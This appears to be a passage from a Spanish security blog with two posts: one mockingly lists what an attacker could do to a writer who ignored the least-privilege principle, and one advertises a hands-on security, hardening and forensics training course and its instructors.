g) Sacar la password del que ha escrito este “Decálogo de rigor”

e) Robar sus fotos

f) Conectarme de forma remota a su Ubuntu infranqueable

g) Instalarle un troyano

e) Instalarle un Rootkit para ocultar rastros

f) Ponerle como fondo de pantalla esta imagen, o en su defecto, esta otra

g) Descojonarme viendo el fondo de pantalla

h) El crusaito…

i) El Maikel Jacson

j) Borrar las copias de seguridad

k) Hacerme las mías propias

l) Montar una botnet

m) Redirigirl la máquina a un repositorio “especial”

Etc, etc…

Y cómo se puede hacer esto, queridos hamijos que con “tanto rigor” escribís? Pues por lo visto, se ha olvidado una pequeñísima norma en materia de seguridad. Vamos, nada del otro mundo. A cualquier “Gurú” seguro que se le pasaría. Un principio… No un principito, un PRINCIPIO. El Principio del mínimo privilegio.

Este “Decálogo” es mucho mejor que éste. Ya hablamos aquí de estos “consejos”….

Os dejo con el documento de aplicación del principio del mínimo privilegio!

http://www.microsoft.com/downloads/details.aspx?FamilyId=6A1291E7-9ECD-4D5D-9EEB-308C5D522E14&displaylang=en

Por cierto…. Creéis que podremos llegar hasta la Z? Se os ocurre algo?

Saludos!!

Formación técnica en seguridad y auditoría

Estándar

Hola a tod@s!

Algunos de mis compis y yo, hemos decidido formar un “grupo de música”. Os cuento detalles….

 

Formación técnica en seguridad y auditor�a

 

Formación técnica en seguridad y auditoría

  • Idea: Formación en “música”
  • Tiempo: 6 semanitas o 150 horitas. Junio y Julio
  • Realización de la formación: Eminentemente práctico

 

Los temarios que se impartirán en el curso serán los siguientes:

 

Música estridente y ensordecedora

  • Partituras: Protocolos, Análisis de servidores, ataques a aplicaciones Web, Vulnerabilidades de código, vulnerabilidades en configuraciones, vulnerabilidades en S.O., spoofing en comunicaciones, sniffing de comunicaciones, ataques combinados, DOS, DDOS, ataques MITM, ataques VOIP, inyección de comunicaciones, malware en general, LDAP injection, inyecciones SQL, ataques WEP/WPA, etc, etc…
  • Instrumentos: La cabeza e instrumentos comerciales y gratuitos. (Nos reservamos demos y juguetes internos!)

Como este tipo de música puede “romper” tus oídos, hemos pensado en aderezar la “formación en música” con estos temas…

 

Prevención a la rotura de tímpano, sordera total, etc…

  • Realización de buenas partituras: VPN, sistemas de cifrado SSL, conceptos de auditoría, auditorías de caja blanca/caja negra, fuentes de información, detección de malware, fortificación de servidores, fortificación de código, análisis de seguridad server/client, herramientas de análisis de código, Firewalls de aplicación, cifrado y autenticación, IPSEC, etc, etc..
  • Instrumentos: La cabeza e instrumentación comercial y gratuita

Y si llegados a un punto, algún tipo de música ha hecho que te sangre el oído u otra enfermedad equivalente, completamos la “formación en música” con…

 

Análisis forense

  • Análisis de las notas: Captura de datos, buenas prácticas, cadena de custodia, análisis forense de Logs, análisis forense Online de Malware, análisis forense Offline de Malware, Análisis de memoria RAM, búsqueda de estructuras, análisis forense de S.O., realización de informes, etc, etc…
  • Instrumentos: La cabeza e instrumentación comercial y gratuita

 

Quienes estaremos

  • Solista: Chema Alonso: MVP Windows Server Security. Este solista está especializado en “saturar” notas musicales. Ha dado multitud de conferencias a lo largo de este país y fuera de él. Últimamente lo hemos podido ver por las conocidas conferencias de seguridad BlackHat. Lo conoceréis más en su blog http://www.elladodelmal.com
  • Bajos: Juan Luis García Rambla: MVP Windows Server Security. Sabe este hombre algo de redes y comunicaciones? Por ahí le llaman el “interceptor”. Este hombre se entretiene capturando y manipulando conversaciones y comunicaciones, modulando la voz, etc, etc.. Un excelente aliado si quieres conocer arquitectura de sistemas operativos, y todo un maestro en técnicas de auditoría forense. Tened cuidado con lo que “conversáis” si estáis cerca de él… Podéis saber más de él visitando su blog, http://legalidadinformatica.blogspot.com
  • Guitarra: Alekusu o Alejandro Martín, alias “el pensante”. Muchas veces lo veo sentado pensando cuál va a ser la próxima prueba que se va a sacar de la manga para el siguiente reto hacking, y creador de muchas de las herramientas internas de auditoría de seguridad que utilizamos.
  • Batería: Pedro Laguna, alias “La Pedra” como amistosamente le llamo yo. Se dedica principalmente a “romper de forma legal” las Webs que le vamos asignando. Así que cuidado con dejarle la vuestra.  Avisados estáis. Su blog es http://www.equilibrioinestable.com
  • Teclados: Yo, alias Juanillo, alias “el trianero”, al que si leéis lo que vomito en el blog de vez en cuando o me conocéis de alguna auditoría o alguna formación, ya sabréis algo de mí, y sí, prometo contar el verdadero chiste del pavo.

Asi que…. Te animas a tocar con nosotros?

Formación técnica en seguridad y auditoría informática

 

Saludos a tod@s!!